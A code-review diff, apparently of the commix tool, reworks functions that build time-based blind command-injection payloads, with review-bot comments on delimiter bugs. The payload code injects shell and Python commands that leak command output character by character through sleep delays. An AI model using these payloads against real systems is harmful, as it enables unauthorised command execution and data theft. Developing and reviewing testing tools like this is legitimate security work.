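Review bot: In `decision_alter_shell` the `)` that closes Python's `time.sleep(` has been replaced by `settings.CMD_SUB_SUFFIX`, both in the two Windows branches (`"time.sleep(" + str(2 * timesec + 1) + settings.CMD_SUB_SUFFIX + "\""`) and in the Unix `else` line (`"time.sleep(" + str(timesec) + settings.CMD_SUB_SUFFIX + "\"" + settings.CMD_SUB_SUFFIX`). That character is Python syntax, not a shell substitution marker — the Windows payloads contain no substitution at all — so it is harmless only while the suffix happens to be `)`; as soon as the tamper turns it into a backtick the generated `-c` program is a syntax error and the delay never fires, which silently defeats the time-based detection. Restore the literals: `"time.sleep(" + str(2 * timesec + 1) + ")\""` and `"time.sleep(" + str(timesec) + ")\"" + settings.CMD_SUB_SUFFIX`. The same replacement was made in cmd_execution_alter_shell (@@ -282, @@ -295, @@ -328) and get_char_alter_shell (@@ -426, @@ -465) of this file.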
@@ -150,11 +145,10 @@ def decision_alter_shell(separator, j, TAG, OUTPUT_TEXTFILE, timesec, http_reque elif separator == "||" : pipe = "|" payload = (pipe + - "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"f = open('" + OUTPUT_TEXTFILE + "', 'w')\nf.write('" + TAG + "')\nf.close()\n\")" + settings.SINGLE_WHITESPACE + + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"f = open('" + OUTPUT_TEXTFILE + "', 'w')\nf.write('" + TAG + "')\nf.close()\n\"" + settings.CMD_SUB_SUFFIX + settings.SINGLE_WHITESPACE + # Find the length of the output, using readline(). - "[ " + str(j) + " -ne $(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"with open(\'" + OUTPUT_TEXTFILE + "\') as file: print(len(file.readline()))\") ] " + separator + - "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\")" + pipe + "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + ")\") " + - separator + "[ " + str(j) + " -ne " + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"with open(\'" + OUTPUT_TEXTFILE + "\') as file: print(len(file.readline()))\") ] " + separator + + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\"" + settings.CMD_SUB_SUFFIX + pipe + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + ")\") " ) else: pass @@ -191,8 +185,8 @@ def cmd_execution(separator, cmd, j, OUTPUT_TEXTFILE, timesec, http_request_meth "powershell.exe -InputFormat none write-host ([int[]][char[]]([string](cmd /c " + cmd + ")))\"')" + settings.SINGLE_WHITESPACE + "do " + settings.WIN_FILE_WRITE_OPERATOR + OUTPUT_TEXTFILE + " '%x'" ) - elif separator == "&&" : - separator = _urllib.parse.quote(separator) + elif separator == _urllib.parse.quote("&&") : + #separator = _urllib.parse.quote(separator) ampersand = _urllib.parse.quote("&") payload = (ampersand + "for /f \"tokens=*\" %i in ('cmd /c \"" + 
@@ -210,43 +204,41 @@ def cmd_execution(separator, cmd, j, OUTPUT_TEXTFILE, timesec, http_request_meth ) else: - settings.USER_APPLIED_CMD = cmd + if separator == ";" or separator == "%0a" : payload = (separator + - "str=$(" + cmd + settings.FILE_WRITE_OPERATOR + OUTPUT_TEXTFILE + separator + " tr '\\n' ' ' < " + OUTPUT_TEXTFILE + " )" + separator + + "str=" + settings.CMD_SUB_PREFIX + cmd + settings.FILE_WRITE_OPERATOR + OUTPUT_TEXTFILE + separator + " tr '\\n' ' ' < " + OUTPUT_TEXTFILE + settings.CMD_SUB_SUFFIX + separator + "echo $str > " + OUTPUT_TEXTFILE + separator + - "str=$(cat " + OUTPUT_TEXTFILE + ")" + separator + + "str=" + settings.CMD_SUB_PREFIX + "cat " + OUTPUT_TEXTFILE + settings.CMD_SUB_SUFFIX + separator + # Find the length of the output. - "str1=$(expr length \"$str\")" + separator + + "str1=" + settings.CMD_SUB_PREFIX + "expr length \"$str\"" + settings.CMD_SUB_SUFFIX + separator + #"str1=${%23str}" + separator + "if [ " + str(j) + " -ne ${str1} ]" + separator + "then sleep 0 " + separator + "else sleep " + str(timesec) + separator + # Transform to ASCII - "str1=$(od -A n -t d1 < " +OUTPUT_TEXTFILE + ")" + separator + + "str1=" + settings.CMD_SUB_PREFIX + "od -A n -t d1 < " +OUTPUT_TEXTFILE + settings.CMD_SUB_SUFFIX + separator + "echo $str1 > " + OUTPUT_TEXTFILE + separator + - "fi" + - separator + "fi" ) - elif separator == "&&" : - separator = _urllib.parse.quote(separator) + elif separator == _urllib.parse.quote("&&") : + #separator = _urllib.parse.quote(separator) ampersand = _urllib.parse.quote("&") payload = (ampersand + "sleep 0 " + separator + - "str=$(" + cmd + settings.FILE_WRITE_OPERATOR + OUTPUT_TEXTFILE + separator + " tr -d '\\n'<" + OUTPUT_TEXTFILE + ")" + separator + + "str=" + settings.CMD_SUB_PREFIX + cmd + settings.FILE_WRITE_OPERATOR + OUTPUT_TEXTFILE + separator + " tr -d '\\n'<" + OUTPUT_TEXTFILE + settings.CMD_SUB_SUFFIX + separator + "echo $str" + settings.FILE_WRITE_OPERATOR + OUTPUT_TEXTFILE + separator + - "str=$(cat 
" + OUTPUT_TEXTFILE + ")" + separator + + "str=" + settings.CMD_SUB_PREFIX + "cat " + OUTPUT_TEXTFILE + settings.CMD_SUB_SUFFIX + separator + # Find the length of the output. - "str1=$(expr length \"$str\")" + separator + + "str1=" + settings.CMD_SUB_PREFIX + "expr length \"$str\"" + settings.CMD_SUB_SUFFIX + separator + #"str1=${%23str}" + separator + "[ " + str(j) + " -eq ${str1} ]" + separator + "sleep " + str(timesec) + separator + # Transform to ASCII - "str1=$(od -A n -t d1<" + OUTPUT_TEXTFILE + ")" + separator + - "echo $str1" + settings.FILE_WRITE_OPERATOR + OUTPUT_TEXTFILE + - separator + "str1=" + settings.CMD_SUB_PREFIX + "od -A n -t d1<" + OUTPUT_TEXTFILE + settings.CMD_SUB_SUFFIX + separator + + "echo $str1" + settings.FILE_WRITE_OPERATOR + OUTPUT_TEXTFILE ) separator = _urllib.parse.unquote(separator) @@ -257,10 +249,9 @@ def cmd_execution(separator, cmd, j, OUTPUT_TEXTFILE, timesec, http_request_meth cmd = checks.add_command_substitution(cmd) payload = (pipe + cmd + settings.FILE_WRITE_OPERATOR + OUTPUT_TEXTFILE + pipe + - "[ " + str(j) + " -ne $(cat " + OUTPUT_TEXTFILE + pipe + + "[ " + str(j) + " -ne " + settings.CMD_SUB_PREFIX + "cat " + OUTPUT_TEXTFILE + pipe + "tr -d '\\n'" + pipe + "wc -c) ]" + separator + - "sleep " + str(timesec) + - separator + "sleep " + str(timesec) ) else: pass 
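Review bot: `settings.USER_APPLIED_CMD = cmd` is removed from the Unix branch of `cmd_execution` and replaced by an empty line, while the same commit adds that very assignment to `cmd_execution_alter_shell` in cb_payloads.py; unless another caller now records the command for the tempfile-based technique, whatever reads `settings.USER_APPLIED_CMD` afterwards will see a stale value. Either keep the line or add a comment naming where the assignment moved. cmd_execution continues outside the hunk (its `||` branch is in the next hunk).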
@@ -282,11 +273,11 @@ def cmd_execution_alter_shell(separator, cmd, j, OUTPUT_TEXTFILE, timesec, http_ "for /f \"tokens=*\" %i in ('cmd /c " + python_payload + "') do if %i==" + str(j) + settings.SINGLE_WHITESPACE + - "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + ")\"" + "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + settings.CMD_SUB_SUFFIX + "\"" ) - elif separator == "&&" : - separator = _urllib.parse.quote(separator) + elif separator == _urllib.parse.quote("&&") : + #separator = _urllib.parse.quote(separator) ampersand = _urllib.parse.quote("&") payload = (ampersand + "for /f \"tokens=*\" %i in ('cmd /c " + 
@@ -295,32 +286,30 @@ def cmd_execution_alter_shell(separator, cmd, j, OUTPUT_TEXTFILE, timesec, http_ "for /f \"tokens=*\" %i in ('cmd /c " + python_payload + "') do if %i==" + str(j) + settings.SINGLE_WHITESPACE + - "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + ")\"" + "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + settings.CMD_SUB_SUFFIX + "\"" ) else: if separator == ";" or separator == "%0a" : payload = (separator + - "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"f = open('" + OUTPUT_TEXTFILE + "', 'w')\nf.write('$(echo $(" + cmd + "))')\nf.close()\n\")" + separator + + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"f = open('" + OUTPUT_TEXTFILE + "', 'w')\nf.write('" + settings.CMD_SUB_PREFIX + "echo " + settings.CMD_SUB_PREFIX + cmd + "))')\nf.close()\n\"" + settings.CMD_SUB_SUFFIX + separator + # Find the length of the output, using readline(). 
- "str1=$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"with open(\'" + OUTPUT_TEXTFILE + "\') as file: print(len(file.readline()))\")" + separator + + "str1=" + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"with open(\'" + OUTPUT_TEXTFILE + "\') as file: print(len(file.readline()))\"" + settings.CMD_SUB_SUFFIX + separator + "if [ " + str(j) + " -ne ${str1} ] " + separator + - "then $(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\")" + separator + - "else $(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + ")\")" + separator + - "fi" + - separator + "then " + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\"" + settings.CMD_SUB_SUFFIX + separator + + "else " + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + settings.CMD_SUB_SUFFIX + "\"" + settings.CMD_SUB_SUFFIX + separator + + "fi" ) - elif separator == "&&" : - separator = _urllib.parse.quote(separator) + elif separator == _urllib.parse.quote("&&") : + #separator = _urllib.parse.quote(separator) ampersand = _urllib.parse.quote("&") payload = (ampersand + - "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\") " + separator + - "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"f = open('" + OUTPUT_TEXTFILE + "', 'w')\nf.write('$(echo $(" + cmd + "))')\nf.close()\n\")" + separator + + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\") " + separator + + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"f = open('" + OUTPUT_TEXTFILE + "', 'w')\nf.write('" + settings.CMD_SUB_PREFIX + "echo " + settings.CMD_SUB_PREFIX + cmd + "))')\nf.close()\n\"" + settings.CMD_SUB_SUFFIX + separator + # Find the length of the output, using readline(). 
- "str1=$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"with open(\'" + OUTPUT_TEXTFILE + "\') as file: print len(file.readline())\") " + separator + + "str1=" + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"with open(\'" + OUTPUT_TEXTFILE + "\') as file: print len(file.readline())\") " + separator + "[ " + str(j) + " -eq ${str1} ] " + separator + - "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + ")\") " + - separator + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + ")\") " ) separator = _urllib.parse.unquote(separator) 
@@ -328,10 +317,9 @@ def cmd_execution_alter_shell(separator, cmd, j, OUTPUT_TEXTFILE, timesec, http_ elif separator == "||" : pipe = "|" payload = (pipe + - "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"f = open('" + OUTPUT_TEXTFILE + "', 'w')\nf.write('$(echo $(" + cmd + "))')\nf.close()\n\")" + settings.SINGLE_WHITESPACE + - "[ " + str(j) + " -ne $(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"with open(\'" + OUTPUT_TEXTFILE + "\') as file: print(len(file.readline()))\") ] " + separator + - "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\")" + pipe + "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + ")\")" + - separator + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"f = open('" + OUTPUT_TEXTFILE + "', 'w')\nf.write('" + settings.CMD_SUB_PREFIX + "echo " + settings.CMD_SUB_PREFIX + cmd + "))')\nf.close()\n\"" + settings.CMD_SUB_SUFFIX + settings.SINGLE_WHITESPACE + + "[ " + str(j) + " -ne " + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"with open(\'" + OUTPUT_TEXTFILE + "\') as file: print(len(file.readline()))\") ] " + separator + + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\"" + settings.CMD_SUB_SUFFIX + pipe + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + settings.CMD_SUB_SUFFIX + "\"" + settings.CMD_SUB_SUFFIX ) else: pass @@ -361,8 +349,8 @@ def get_char(separator, OUTPUT_TEXTFILE, num_of_chars, ascii_char, timesec, http "cmd /c \"powershell.exe -InputFormat none Start-Sleep -s " + str(2 * timesec + 1) + "\"" ) - elif separator == "&&" : - separator = _urllib.parse.quote(separator) + elif separator == _urllib.parse.quote("&&") : + #separator = _urllib.parse.quote(separator) ampersand = _urllib.parse.quote("&") payload = (ampersand + "for /f \"tokens=*\" %i in ('cmd /c \"powershell.exe -InputFormat none " 
@@ -375,24 +363,22 @@ def get_char(separator, OUTPUT_TEXTFILE, num_of_chars, ascii_char, timesec, http if separator == ";" or separator == "%0a" : payload = (separator + # Use space as delimiter - "str=$(cut -d ' ' -f " + str(num_of_chars) + " < " + OUTPUT_TEXTFILE + ")" + separator + + "str=" + settings.CMD_SUB_PREFIX + "cut -d ' ' -f " + str(num_of_chars) + " < " + OUTPUT_TEXTFILE + settings.CMD_SUB_SUFFIX + separator + "if [ " + str(ascii_char) + " -ne ${str} ]" + separator + "then sleep 0" + separator + "else sleep " + str(timesec) + separator + - "fi" + - separator + "fi" ) - elif separator == "&&" : - separator = _urllib.parse.quote(separator) + elif separator == _urllib.parse.quote("&&") : + #separator = _urllib.parse.quote(separator) ampersand = _urllib.parse.quote("&") payload = (ampersand + "sleep 0" + separator + # Use space as delimiter - "str=$(awk '{print$" + str(num_of_chars) + "}'<" + OUTPUT_TEXTFILE + ")" + separator + + "str=" + settings.CMD_SUB_PREFIX + "awk '{print$" + str(num_of_chars) + "}'<" + OUTPUT_TEXTFILE + settings.CMD_SUB_SUFFIX + separator + "[ " + str(ascii_char) + " -eq ${str} ] " + separator + - "sleep " + str(timesec) + - separator + "sleep " + str(timesec) ) separator = _urllib.parse.unquote(separator) @@ -400,14 +386,13 @@ def get_char(separator, OUTPUT_TEXTFILE, num_of_chars, ascii_char, timesec, http elif separator == "||" : pipe = "|" payload = (pipe + - "[ " + str(ascii_char) + " -ne $(cat " + OUTPUT_TEXTFILE + + "[ " + str(ascii_char) + " -ne " + settings.CMD_SUB_PREFIX + "cat " + OUTPUT_TEXTFILE + pipe + "tr -d '\\n'" + pipe + "cut -c " + str(num_of_chars) + pipe + "od -N 1 -i" + pipe + "head -1" + pipe + "awk '{print$2}') ] " + separator + - "sleep " + str(timesec) + - separator + "sleep " + str(timesec) ) else: pass 
@@ -426,38 +411,36 @@ def get_char_alter_shell(separator, OUTPUT_TEXTFILE, num_of_chars, ascii_char, t "for /f \"tokens=*\" %i in ('cmd /c " + python_payload + "') do if %i==" + str(ascii_char) + settings.SINGLE_WHITESPACE + - "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + ")\"" + "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + settings.CMD_SUB_SUFFIX + "\"" ) - elif separator == "&&" : - separator = _urllib.parse.quote(separator) + elif separator == _urllib.parse.quote("&&") : + #separator = _urllib.parse.quote(separator) ampersand = _urllib.parse.quote("&") payload = (ampersand + "for /f \"tokens=*\" %i in ('cmd /c " + python_payload + "') do if %i==" + str(ascii_char) + settings.SINGLE_WHITESPACE + - "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + ")\"" + "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + settings.CMD_SUB_SUFFIX + "\"" ) else: if separator == ";" or separator == "%0a" : payload = (separator + - "str=$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"with open('" + OUTPUT_TEXTFILE +"') as file: print(ord(file.readlines()[0][" + str(num_of_chars - 1) + "]))\nexit(0)\")" + separator + + "str=" + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"with open('" + OUTPUT_TEXTFILE +"') as file: print(ord(file.readlines()[0][" + str(num_of_chars - 1) + "]))\nexit(0)\"" + settings.CMD_SUB_SUFFIX + separator + "if [ " + str(ascii_char) + " -ne ${str} ]" + separator + - "then $(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\")" + separator + - "else $(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + ")\")" + separator + - "fi" + - separator + "then " + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\"" + 
settings.CMD_SUB_SUFFIX + separator + + "else " + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + settings.CMD_SUB_SUFFIX + "\"" + settings.CMD_SUB_SUFFIX + separator + + "fi" ) - elif separator == "&&" : - separator = _urllib.parse.quote(separator) + elif separator == _urllib.parse.quote("&&") : + #separator = _urllib.parse.quote(separator) ampersand = _urllib.parse.quote("&") payload = (ampersand + - "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\") " + separator + - "str=$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"with open('" + OUTPUT_TEXTFILE +"') as file: print(ord(file.readlines()[0][" + str(num_of_chars - 1) + "]))\nexit(0)\")" + separator + + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\") " + separator + + "str=" + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"with open('" + OUTPUT_TEXTFILE +"') as file: print(ord(file.readlines()[0][" + str(num_of_chars - 1) + "]))\nexit(0)\"" + settings.CMD_SUB_SUFFIX + separator + "[ " + str(ascii_char) + " -eq ${str} ] " + separator + - "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + ")\")" + - separator + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + settings.CMD_SUB_SUFFIX + "\"" + settings.CMD_SUB_SUFFIX ) separator = _urllib.parse.unquote(separator) 
@@ -465,9 +448,8 @@ def get_char_alter_shell(separator, OUTPUT_TEXTFILE, num_of_chars, ascii_char, t
 elif separator == "||" :
 pipe = "|"
 payload = (pipe +
- "[ " + str(ascii_char) + " -ne $(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"with open('" + OUTPUT_TEXTFILE +"') as file: print(ord(file.readlines()[0][" + str(num_of_chars - 1) + "]))\nexit(0)\") ] " + separator +
- "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\")" + pipe + "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + ")\")" +
- separator
+ "[ " + str(ascii_char) + " -ne " + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"with open('" + OUTPUT_TEXTFILE +"') as file: print(ord(file.readlines()[0][" + str(num_of_chars - 1) + "]))\nexit(0)\") ] " + separator +
+ settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\"" + settings.CMD_SUB_SUFFIX + pipe + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + settings.CMD_SUB_SUFFIX + "\"" + settings.CMD_SUB_SUFFIX
 )
 else:
 pass
@@ -496,8 +478,8 @@ def fp_result(separator, OUTPUT_TEXTFILE, ascii_char, timesec, http_request_meth
 "cmd /c \"powershell.exe -InputFormat none Start-Sleep -s " + str(2 * timesec + 1) + "\""
 )
- elif separator == "&&" :
- separator = _urllib.parse.quote(separator)
+ elif separator == _urllib.parse.quote("&&") :
+ #separator = _urllib.parse.quote(separator)
 ampersand = _urllib.parse.quote("&")
 payload = (ampersand +
 "for /f \"tokens=*\" %i in (' cmd /c \"powershell.exe -InputFormat none "
@@ -509,23 +491,21 @@ def fp_result(separator, OUTPUT_TEXTFILE, ascii_char, timesec, http_request_meth
 else:
 if separator == ";" or separator == "%0a" :
 payload = (separator +
- "str=$(cut -c1-2 " + OUTPUT_TEXTFILE + ")" + separator +
+ "str=" + settings.CMD_SUB_PREFIX + "cut -c1-2 " + OUTPUT_TEXTFILE + settings.CMD_SUB_SUFFIX + separator +
 "if [ " + str(ord(str(ascii_char))) + " -ne ${str} ]" + separator +
 "then sleep 0" + separator +
 "else sleep " + str(timesec) + separator +
- "fi" +
- separator
+ "fi"
 )
- elif separator == "&&" :
- separator = _urllib.parse.quote(separator)
+ elif separator == _urllib.parse.quote("&&") :
+ #separator = _urllib.parse.quote(separator)
 ampersand = _urllib.parse.quote("&")
 payload = (ampersand +
 "sleep 0" + separator +
- "str=$(cut -c1-2 " + OUTPUT_TEXTFILE + ")" + separator +
+ "str=" + settings.CMD_SUB_PREFIX + "cut -c1-2 " + OUTPUT_TEXTFILE + settings.CMD_SUB_SUFFIX + separator +
 "[ " + str(ord(str(ascii_char))) + " -eq ${str} ] " + separator +
- "sleep " + str(timesec) +
- separator
+ "sleep " + str(timesec)
 )
 separator = _urllib.parse.unquote(separator)
@@ -533,9 +513,8 @@ def fp_result(separator, OUTPUT_TEXTFILE, ascii_char, timesec, http_request_meth
 elif separator == "||" :
 pipe = "|"
 payload = (pipe +
- "[ " + str(ascii_char) + " -ne $(cat " + OUTPUT_TEXTFILE + ") ] " + separator +
- "sleep " + str(timesec) +
- separator
+ "[ " + str(ascii_char) + " -ne " + settings.CMD_SUB_PREFIX + "cat " + OUTPUT_TEXTFILE + ") ] " + separator +
+ "sleep " + str(timesec)
 )
 else:
 pass
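Review bot: In the `||` branch of fp_result (hunk @@ -533) the opener was switched to settings.CMD_SUB_PREFIX but the closer is still the literal `") ] "`, so the two delimiters no longer form a pair. fp_result is a non-alter-shell Unix builder, which is exactly the case in which backticks.py (later in this patch) sets both markers to a backtick, so with that tamper active the substitution would open with a backtick and never close. The `;`/`%0a` and `&&` branches in the hunk above (@@ -509) already do it right, so this is the only line in fp_result left behind: `"[ " + str(ascii_char) + " -ne " + settings.CMD_SUB_PREFIX + "cat " + OUTPUT_TEXTFILE + settings.CMD_SUB_SUFFIX + " ] " + separator +`.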
@@ -555,37 +534,35 @@ def fp_result_alter_shell(separator, OUTPUT_TEXTFILE, num_of_chars, ascii_char,
 "for /f \"tokens=*\" %i in ('cmd /c " + python_payload + "') do if %i==" + str(ascii_char) + settings.SINGLE_WHITESPACE +
- "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + ")\""
+ "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + settings.CMD_SUB_SUFFIX + "\""
 )
- elif separator == "&&" :
- separator = _urllib.parse.quote(separator)
+ elif separator == _urllib.parse.quote("&&") :
+ #separator = _urllib.parse.quote(separator)
 ampersand = _urllib.parse.quote("&")
 payload = (ampersand +
 "for /f \"tokens=*\" %i in ('cmd /c " + python_payload + "') do if %i==" + str(ascii_char) + settings.SINGLE_WHITESPACE +
- "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + ")\""
+ "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + settings.CMD_SUB_SUFFIX + "\""
 )
 else:
 if separator == ";" or separator == "%0a" :
 payload = (separator +
- "str=$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"with open('" + OUTPUT_TEXTFILE +"') as file: print(file.readlines()[0][" + str(num_of_chars - 1) + "])\nexit(0)\")" + separator +
+ "str=" + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"with open('" + OUTPUT_TEXTFILE +"') as file: print(file.readlines()[0][" + str(num_of_chars - 1) + "])\nexit(0)\"" + settings.CMD_SUB_SUFFIX + separator +
 "if [ " + str(ascii_char) + " -ne ${str} ]" + separator +
- "then $(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\")" + separator +
- "else $(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + ")\")" + separator +
- "fi" +
- separator
+ "then " + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\"" + settings.CMD_SUB_SUFFIX + separator +
+ "else " + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + settings.CMD_SUB_SUFFIX + "\"" + settings.CMD_SUB_SUFFIX + separator +
+ "fi"
 )
- elif separator == "&&" :
- separator = _urllib.parse.quote(separator)
+ elif separator == _urllib.parse.quote("&&") :
+ #separator = _urllib.parse.quote(separator)
 ampersand = _urllib.parse.quote("&")
 payload = (ampersand +
- "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\") " + separator +
- "str=$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"with open('" + OUTPUT_TEXTFILE +"') as file: print(file.readlines()[0][" + str(num_of_chars - 1) + "])\nexit(0)\") " + separator +
+ settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\") " + separator +
+ "str=" + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"with open('" + OUTPUT_TEXTFILE +"') as file: print(file.readlines()[0][" + str(num_of_chars - 1) + "])\nexit(0)\") " + separator +
 "[ " + str(ascii_char) + " -eq ${str} ] " + separator +
- "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + ")\")" +
- separator
+ settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + settings.CMD_SUB_SUFFIX + "\"" + settings.CMD_SUB_SUFFIX
 )
 separator = _urllib.parse.unquote(separator)
@@ -593,9 +570,8 @@ def fp_result_alter_shell(separator, OUTPUT_TEXTFILE, num_of_chars, ascii_char,
 elif separator == "||" :
 pipe = "|"
 payload = (pipe +
- "[ " + str(ascii_char) + " -ne $(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"with open('" + OUTPUT_TEXTFILE +"') as file: print(file.readlines()[0][" + str(num_of_chars - 1) + "])\nexit(0)\") ] " + separator +
- "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\")" + pipe + "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + ")\")" +
- separator
+ "[ " + str(ascii_char) + " -ne " + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"with open('" + OUTPUT_TEXTFILE +"') as file: print(file.readlines()[0][" + str(num_of_chars - 1) + "])\nexit(0)\") ] " + separator +
+ settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\"" + settings.CMD_SUB_SUFFIX + pipe + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + settings.CMD_SUB_SUFFIX + "\"" + settings.CMD_SUB_SUFFIX
 )
 else:
 pass
diff --git a/src/core/tamper/backticks.py b/src/core/tamper/backticks.py
index a9d1c80086..ae21a90b08 100644
--- a/src/core/tamper/backticks.py
+++ b/src/core/tamper/backticks.py
@@ -13,8 +13,10 @@
 For more see the file 'readme/COPYING' for copying permission.
 """
+from src.utils import menu
 from src.utils import settings
+
 """
 About: Uses backticks instead of "$()" for commands substitution on the generated payloads.
 Notes: This tamper script works against Unix-like target(s).
@@ -27,8 +29,9 @@ def tamper(payload):
 settings.TAMPER_SCRIPTS[__tamper__] = True
- settings.USE_BACKTICKS = True
- payload = payload.replace("$((", "`expr" + settings.WHITESPACES[0]).replace("))", "`")
+ if not menu.options.alter_shell and not settings.TARGET_OS == settings.OS.WINDOWS:
+ settings.USE_BACKTICKS = True
